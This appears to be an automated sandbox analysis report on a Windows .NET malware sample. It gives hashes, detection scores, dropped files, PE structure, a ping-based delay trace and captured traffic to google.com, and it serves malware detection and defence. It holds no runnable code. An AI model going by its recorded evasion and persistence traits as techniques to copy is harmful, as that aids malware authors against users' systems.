• Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                  • Not all processes were analyzed; report is missing behavior information
                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                  • VT rate limit hit for: atpRyiZGTE.exe
                                                  Time | Type | Description
                                                  09:49:02 | API Interceptor | 184x Sleep call for process: atpRyiZGTE.exe modified
                                                  No context
                                                  Process:C:\Users\user\Desktop\atpRyiZGTE.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1216
                                                  Entropy (8bit):5.355304211458859
                                                  Encrypted:false
                                                  SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                                                  MD5:69206D3AF7D6EFD08F4B4726998856D3
                                                  SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                                                  SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                                                  SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                                                  Malicious:true
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1598976
                                                  Entropy (8bit):6.542587858621466
                                                  Encrypted:false
                                                  SSDEEP:24576:hfFQnGpTDv52xFCsS4M61DPcnc4VsBKm6cCEtfG4RTRTHTM:hfFQnkV2TCo1DPcnc4VsKm6c9NxDXM
                                                  MD5:0515B4D32D6D65D19832858957F0847F
                                                  SHA1:3CB9ACC775DA6908C56890F0827398B817467E0E
                                                  SHA-256:9027302B65C696C2E079F70C18F55ABC1FD10C497B4CAD63BDBFBD8AC110B916
                                                  SHA-512:9E145260E75D7359772FAB436372CCFA249054F4CDA7E9FAFD2A67B7CC7B8166CBD1F38C73CD89737E3EA6F6D670684400250ADB26CD777080D4A203E4FD409E
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 42%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......2................................. ........@.. ....................................`.....................................S.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc...............d..............@..B.......................H.......0...x.......y... {...............................................j.?f...k.........i....12..w..1=...L.Q..(.~>.lE+.R.|../.4z.F....a.....).#.}..LB.Q~..!...@s....p..E..........^....@N...n..i.O.6.q.L.Z...C]..e......!.xf0.#.w.;..EN9Mr0..'M.\.".|.B..`l..{H.~&...<S ......p.*..&......J6.S.*x?.0E. ..Y.Y....l..!.i+.....G._.oT.........9.J.G......K.^Z... %..R.O.......z^..r.@.6.%.........POW.fj...u.mLC...Ts...8...=....\."U.dF.5..F.o...(@C...z.....S.a...}v.0.,9.
                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:modified
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:true
                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                  Process:C:\Windows\SysWOW64\PING.EXE
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):2440
                                                  Entropy (8bit):4.725663483598328
                                                  Encrypted:false
                                                  SSDEEP:12:PKMRJpTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTd:/elAokItULVDv
                                                  MD5:CE2B4D3E2C6F89A5578B7B2574D9316A
                                                  SHA1:0B97F330E453CBCD78F3FE1C41675DF80D8BC81A
                                                  SHA-256:23F40B2D6379451ACD948C88723D09339D6386D08C068D70A9DC67EB56D3FB95
                                                  SHA-512:1AE47563977707328E8381BF37E1628B57886A9B570314D36225A628130B7F83058D5C4889C7BDF48F0719181B302985F3913264089854029098385B3D5C7E8F
                                                  Malicious:false
                                                  Preview:..Pinging 127.0.0.1 with 32 bytes of data:..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: byt
                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):6.542587858621466
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  • DOS Executable Generic (2002/1) 0.01%
                                                  File name:atpRyiZGTE.exe
                                                  File size:1598976
                                                  MD5:0515b4d32d6d65d19832858957f0847f
                                                  SHA1:3cb9acc775da6908c56890f0827398b817467e0e
                                                  SHA256:9027302b65c696c2e079f70c18f55abc1fd10c497b4cad63bdbfbd8ac110b916
                                                  SHA512:9e145260e75d7359772fab436372ccfa249054f4cda7e9fafd2a67b7cc7b8166cbd1f38c73cd89737e3ea6f6d670684400250adb26cd777080d4a203e4fd409e
                                                  SSDEEP:24576:hfFQnGpTDv52xFCsS4M61DPcnc4VsBKm6cCEtfG4RTRTHTM:hfFQnkV2TCo1DPcnc4VsKm6c9NxDXM
                                                  TLSH:4575BEA22B857E03C03CA63E8234F54093F6FDCAA349C79D7DD5B5C666A23413BA2754
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......2................................. ........@.. ....................................`................................
                                                  Icon Hash:8e2b6d6c6c69abcc
                                                  Entrypoint:0x56a3fe
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x32E593FC [Wed Jan 22 04:13:48 1997 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  add byte ptr [eax], al
                                                  Name | Virtual Address | Virtual Size | Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0x16a3a8 | 0x53 | .text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x16c000 | 0x1db00 | .rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x18a000 | 0xc | .reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                  Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                  .text | 0x2000 | 0x168404 | 0x168600 | False | 0.6130488802896289 | data | 6.475046719062856 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rsrc | 0x16c000 | 0x1db00 | 0x1dc00 | False | 0.7296316964285714 | data | 6.869642401970742 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc | 0x18a000 | 0xc | 0x200 | False | 0.041015625 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                  Name | RVA | Size | Type | Language | Country
                                                  RT_ICON | 0x16c628 | 0x1c57 | PNG image data, 128 x 128, 8-bit colormap, non-interlaced
                                                  RT_ICON | 0x16e280 | 0x1628 | data
                                                  RT_ICON | 0x16f8a8 | 0xea8 | data
                                                  RT_ICON | 0x170750 | 0x8a8 | data
                                                  RT_ICON | 0x170ff8 | 0x6c8 | dBase III DBT, version number 0, next free block index 40
                                                  RT_ICON | 0x1716c0 | 0x568 | GLS_BINARY_LSB_FIRST
                                                  RT_ICON | 0x171c28 | 0x8683 | PNG image data, 256 x 256, 8-bit/color RGB, non-interlaced
                                                  RT_ICON | 0x17a2ac | 0x3d5c | PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                  RT_ICON | 0x17e008 | 0x4228 | data
                                                  RT_ICON | 0x182230 | 0x25a8 | data
                                                  RT_ICON | 0x1847d8 | 0x10a8 | data
                                                  RT_ICON | 0x185880 | 0x988 | data
                                                  RT_ICON | 0x186208 | 0x468 | GLS_BINARY_LSB_FIRST
                                                  RT_ICON | 0x186670 | 0x2e8 | data
                                                  RT_ICON | 0x186958 | 0x128 | GLS_BINARY_LSB_FIRST
                                                  RT_ICON | 0x186a80 | 0x128 | GLS_BINARY_LSB_FIRST
                                                  RT_ICON | 0x186ba8 | 0x2e8 | data
                                                  RT_ICON | 0x186e90 | 0x2e8 | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 4294967295, next used block 4286019583
                                                  RT_ICON | 0x187178 | 0x128 | GLS_BINARY_LSB_FIRST
                                                  RT_ICON | 0x1872a0 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0
                                                  RT_ICON | 0x187b48 | 0x568 | GLS_BINARY_LSB_FIRST
                                                  RT_ICON | 0x1880b0 | 0xca8 | dBase IV DBT of @.DBF, block length 3072, next free block index 40, next free block 4143380214, next used block 4143380214
                                                  RT_ICON | 0x188d58 | 0x368 | GLS_BINARY_LSB_FIRST
                                                  RT_ICON | 0x1890c0 | 0x468 | GLS_BINARY_LSB_FIRST
                                                  RT_ICON | 0x189528 | 0x128 | GLS_BINARY_LSB_FIRST
                                                  RT_GROUP_ICON | 0x189650 | 0xbc | data
                                                  RT_GROUP_ICON | 0x18970c | 0x22 | data
                                                  RT_GROUP_ICON | 0x189730 | 0x22 | data
                                                  RT_GROUP_ICON | 0x189754 | 0x5a | data
                                                  RT_GROUP_ICON | 0x1897b0 | 0x22 | data
                                                  RT_VERSION | 0x1897d4 | 0x32c | data | English | United States
                                                  DLL | Import
                                                  mscoree.dll | _CorExeMain
                                                  Language of compilation system | Country where language is spoken | Map
                                                  English | United States
                                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                  Jun 26, 2022 09:48:20.692310095 CEST | 49746 | 443 | 192.168.2.4 | 142.250.185.100
                                                  Jun 26, 2022 09:48:20.692351103 CEST | 443 | 49746 | 142.250.185.100 | 192.168.2.4
                                                  Jun 26, 2022 09:48:20.692446947 CEST | 49746 | 443 | 192.168.2.4 | 142.250.185.100
                                                  Jun 26, 2022 09:48:20.764801979 CEST | 49746 | 443 | 192.168.2.4 | 142.250.185.100
                                                  Jun 26, 2022 09:48:20.764837980 CEST | 443 | 49746 | 142.250.185.100 | 192.168.2.4
                                                  Jun 26, 2022 09:48:20.817599058 CEST | 443 | 49746 | 142.250.185.100 | 192.168.2.4
                                                  Jun 26, 2022 09:48:20.817701101 CEST | 49746 | 443 | 192.168.2.4 | 142.250.185.100
                                                  Jun 26, 2022 09:48:20.821000099 CEST | 49746 | 443 | 192.168.2.4 | 142.250.185.100
                                                  Jun 26, 2022 09:48:20.821022034 CEST | 443 | 49746 | 142.250.185.100 | 192.168.2.4
                                                  Jun 26, 2022 09:48:20.821403027 CEST | 443 | 49746 | 142.250.185.100 | 192.168.2.4
                                                  Jun 26, 2022 09:48:21.009613037 CEST | 49746 | 443 | 192.168.2.4 | 142.250.185.100
                                                  Jun 26, 2022 09:48:21.224230051 CEST | 49746 | 443 | 192.168.2.4 | 142.250.185.100
                                                  Jun 26, 2022 09:48:21.264503002 CEST | 443 | 49746 | 142.250.185.100 | 192.168.2.4
                                                  Jun 26, 2022 09:48:21.283855915 CEST | 443 | 49746 | 142.250.185.100 | 192.168.2.4
                                                  Jun 26, 2022 09:48:21.283974886 CEST | 443 | 49746 | 142.250.185.100 | 192.168.2.4
                                                  Jun 26, 2022 09:48:21.284046888 CEST | 49746 | 443 | 192.168.2.4 | 142.250.185.100
                                                  Jun 26, 2022 09:48:21.284091949 CEST | 443 | 49746 | 142.250.185.100 | 192.168.2.4
                                                  Jun 26, 2022 09:48:21.284181118 CEST | 443 | 49746 | 142.250.185.100 | 192.168.2.4
                                                  Jun 26, 2022 09:48:21.284250975 CEST | 443 | 49746 | 142.250.185.100 | 192.168.2.4
                                                  Jun 26, 2022 09:48:21.284262896 CEST | 49746 | 443 | 192.168.2.4 | 142.250.185.100
                                                  Jun 26, 2022 09:48:21.284284115 CEST | 443 | 49746 | 142.250.185.100 | 192.168.2.4
                                                  Jun 26, 2022 09:48:21.284348965 CEST | 49746 | 443 | 192.168.2.4 | 142.250.185.100
                                                  Jun 26, 2022 09:48:21.284708977 CEST | 443 | 49746 | 142.250.185.100 | 192.168.2.4
                                                  Jun 26, 2022 09:48:21.285936117 CEST | 443 | 49746 | 142.250.185.100 | 192.168.2.4
                                                  Jun 26, 2022 09:48:21.286016941 CEST | 443 | 49746 | 142.250.185.100 | 192.168.2.4
                                                  Jun 26, 2022 09:48:21.286029100 CEST | 49746 | 443 | 192.168.2.4 | 142.250.185.100
                                                  Jun 26, 2022 09:48:21.286052942 CEST | 443 | 49746 | 142.250.185.100 | 192.168.2.4
                                                  Jun 26, 2022 09:48:21.286099911 CEST | 49746 | 443 | 192.168.2.4 | 142.250.185.100
                                                  Jun 26, 2022 09:48:21.287271976 CEST | 443 | 49746 | 142.250.185.100 | 192.168.2.4
                                                  Jun 26, 2022 09:48:21.288619995 CEST | 443 | 49746 | 142.250.185.100 | 192.168.2.4
                                                  Jun 26, 2022 09:48:21.288696051 CEST | 443 | 49746 | 142.250.185.100 | 192.168.2.4
                                                  Jun 26, 2022 09:48:21.288716078 CEST | 49746 | 443 | 192.168.2.4 | 142.250.185.100
                                                  Jun 26, 2022 09:48:21.288743973 CEST | 443 | 49746 | 142.250.185.100 | 192.168.2.4
                                                  Jun 26, 2022 09:48:21.288794994 CEST | 49746 | 443 | 192.168.2.4 | 142.250.185.100
                                                  Jun 26, 2022 09:48:21.300412893 CEST | 443 | 49746 | 142.250.185.100 | 192.168.2.4
                                                  Jun 26, 2022 09:48:21.300869942 CEST | 443 | 49746 | 142.250.185.100 | 192.168.2.4
                                                  Jun 26, 2022 09:48:21.300940037 CEST | 443 | 49746 | 142.250.185.100 | 192.168.2.4
                                                  Jun 26, 2022 09:48:21.300992966 CEST | 49746 | 443 | 192.168.2.4 | 142.250.185.100
                                                  Jun 26, 2022 09:48:21.301035881 CEST | 443 | 49746 | 142.250.185.100 | 192.168.2.4
                                                  Jun 26, 2022 09:48:21.301119089 CEST | 49746 | 443 | 192.168.2.4 | 142.250.185.100
                                                  Jun 26, 2022 09:48:21.302185059 CEST | 443 | 49746 | 142.250.185.100 | 192.168.2.4
                                                  Jun 26, 2022 09:48:21.303555012 CEST | 443 | 49746 | 142.250.185.100 | 192.168.2.4
                                                  Jun 26, 2022 09:48:21.303637981 CEST | 443 | 49746 | 142.250.185.100 | 192.168.2.4
                                                  Jun 26, 2022 09:48:21.303685904 CEST | 49746 | 443 | 192.168.2.4 | 142.250.185.100
                                                  Jun 26, 2022 09:48:21.303713083 CEST | 443 | 49746 | 142.250.185.100 | 192.168.2.4
                                                  Jun 26, 2022 09:48:21.303775072 CEST | 49746 | 443 | 192.168.2.4 | 142.250.185.100
                                                  Jun 26, 2022 09:48:21.304765940 CEST | 443 | 49746 | 142.250.185.100 | 192.168.2.4
                                                  Jun 26, 2022 09:48:21.306030989 CEST | 443 | 49746 | 142.250.185.100 | 192.168.2.4
                                                  Jun 26, 2022 09:48:21.306128025 CEST | 49746 | 443 | 192.168.2.4 | 142.250.185.100
                                                  Jun 26, 2022 09:48:21.306149006 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.307329893 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.307384968 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.307414055 CEST49746443192.168.2.4142.250.185.100
                                                  Jun 26, 2022 09:48:21.307430983 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.307475090 CEST49746443192.168.2.4142.250.185.100
                                                  Jun 26, 2022 09:48:21.308541059 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.309636116 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.309689999 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.309756994 CEST49746443192.168.2.4142.250.185.100
                                                  Jun 26, 2022 09:48:21.309781075 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.309827089 CEST49746443192.168.2.4142.250.185.100
                                                  Jun 26, 2022 09:48:21.310713053 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.311939001 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.312007904 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.312042952 CEST49746443192.168.2.4142.250.185.100
                                                  Jun 26, 2022 09:48:21.312062025 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.312105894 CEST49746443192.168.2.4142.250.185.100
                                                  Jun 26, 2022 09:48:21.312947989 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.314049959 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.314114094 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.314165115 CEST49746443192.168.2.4142.250.185.100
                                                  Jun 26, 2022 09:48:21.314188957 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.314249039 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.314279079 CEST49746443192.168.2.4142.250.185.100
                                                  Jun 26, 2022 09:48:21.314316034 CEST49746443192.168.2.4142.250.185.100
                                                  Jun 26, 2022 09:48:21.326067924 CEST49746443192.168.2.4142.250.185.100
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jun 26, 2022 09:48:20.636743069 CEST | 60506 | 53 | 192.168.2.4 | 8.8.8.8
Jun 26, 2022 09:48:20.662038088 CEST | 53 | 60506 | 8.8.8.8 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jun 26, 2022 09:48:20.636743069 CEST | 192.168.2.4 | 8.8.8.8 | 0xc6da | Standard query (0) | www.google.com | A (IP address) | IN (0x0001)

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jun 26, 2022 09:48:20.662038088 CEST | 8.8.8.8 | 192.168.2.4 | 0xc6da | No error (0) | www.google.com | | 142.250.185.100 | A (IP address) | IN (0x0001)

• www.google.com

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49746 | 142.250.185.100 | 443 | C:\Users\user\Desktop\atpRyiZGTE.exe

Timestamp | kBytes transferred | Direction | Data
2022-06-26 07:48:21 UTC | 0 | OUT | GET / HTTP/1.1
Host: www.google.com
Connection: Keep-Alive
2022-06-26 07:48:21 UTC | 0 | IN | HTTP/1.1 200 OK
Date: Sun, 26 Jun 2022 07:48:21 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: AEC=AakniGPWn24ct2sLJwkW8tir5SqQA7-iC8qNpsQ5GdxWywSGbxpJrJNDqg; expires=Fri, 23-Dec-2022 07:48:21 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
Set-Cookie: __Secure-ENID=5.SE=X8yGHJuvgnzc55XoNk8_Mza3nrf_VAoZchfNhOXPFcbqcmgj1aewySqRYSnGFa0ilk8eMV4EXP5nkNk3gV51yHqvAH8wD5DgmNpHFFfLVYb-7qDKKviaOiPYs4cwftZ1orAh6t7MMg7MqKj8TIZ_ACF7qCnLvdxGp80kbDkVtx8; expires=Thu, 27-Jul-2023 00:06:39 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
Set-Cookie: CONSENT=PENDING+312; expires=Tue, 25-Jun-2024 07:48:21 GMT; path=/; domain=.google.com; Secure
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
                                                  Data Ascii: ("li"),z=document.createElement("div");y.className="gbmtc";z.className="gbmt gbmh";y.appendChild(z);k.insertBefore(y,k.childNodes[l])}g.addHover&&g.addHover(a)}else k.appendChild(m)}}catch(Eb){r(Eb,"sb","al")}},fb=function(a,b){for(var c=b.length,d=0;d<c
                                                  2022-06-26 07:48:21 UTC29INData Raw: 6e 65 72 48 54 4d 4c 3d 66 3b 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6b 29 7d 7d 65 6c 73 65 20 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 62 3b 51 28 61 2c 21 30 29 7d 7d 7d 2c 51 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 28 62 3d 76 6f 69 64 20 30 21 3d 3d 62 3f 62 3a 21 30 29 3f 4a 28 61 2c 22 67 62 6d 73 67 6f 22 29 3a 4b 28 61 2c 22 67 62 6d 73 67 6f 22 29 7d 2c 24 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 6f 72 28 76 61 72 20 62 3d 30 2c 63 3b 63 3d 61 2e 63 68 69 6c 64 4e 6f 64 65 73 5b 62 5d 3b 62 2b 2b 29 69 66 28 48 28 63 2c 22 67 62 6d 73 67 22 29 29 72 65 74 75 72 6e 20 63 7d 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 71 62 26 26 77 69 6e 64 6f 77 2e 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 71 62 29 7d 2c 75 62 3d 66 75 6e 63 74 69 6f 6e 28 61
                                                  Data Ascii: nerHTML=f;d.appendChild(k)}}else d.innerHTML=b;Q(a,!0)}}},Q=function(a,b){(b=void 0!==b?b:!0)?J(a,"gbmsgo"):K(a,"gbmsgo")},$a=function(a){for(var b=0,c;c=a.childNodes[b];b++)if(H(c,"gbmsg"))return c},P=function(){qb&&window.clearTimeout(qb)},ub=function(a
                                                  2022-06-26 07:48:21 UTC30INData Raw: 35 35 64 36 61 36 62 37 38 37 64 63 63 32 61 34 30 36 32 65 36 65 39 38 32 34 2e 6a 73 22 2c 69 6e 64 65 78 3a 22 22 2c 6c 61 6e 67 3a 22 65 6e 22 7d 3b 76 2e 67 63 3d 42 62 3b 76 61 72 20 43 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 61 70 69 73 26 26 77 69 6e 64 6f 77 2e 69 66 72 61 6d 65 73 3f 61 26 26 61 28 29 3a 28 61 26 26 74 61 28 61 29 2c 44 28 22 67 63 22 29 29 7d 3b 70 28 22 6c 47 43 22 2c 43 62 29 3b 68 2e 61 28 22 31 22 29 26 26 70 28 22 6c 50 57 46 22 2c 43 62 29 7d 3b 77 69 6e 64 6f 77 2e 5f 5f 50 56 54 3d 22 22 3b 69 66 28 68 2e 61 28 22 31 22 29 26 26 68 2e 61 28 22 31 22 29 29 7b 76 61 72 20 44 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 43 62 28 66 75 6e 63 74 69 6f 6e 28 29 7b 41 28 22 70 77 22 2c 61
                                                  Data Ascii: 55d6a6b787dcc2a4062e6e9824.js",index:"",lang:"en"};v.gc=Bb;var Cb=function(a){window.googleapis&&window.iframes?a&&a():(a&&ta(a),D("gc"))};p("lGC",Cb);h.a("1")&&p("lPWF",Cb)};window.__PVT="";if(h.a("1")&&h.a("1")){var Db=function(a){Cb(function(){A("pw",a
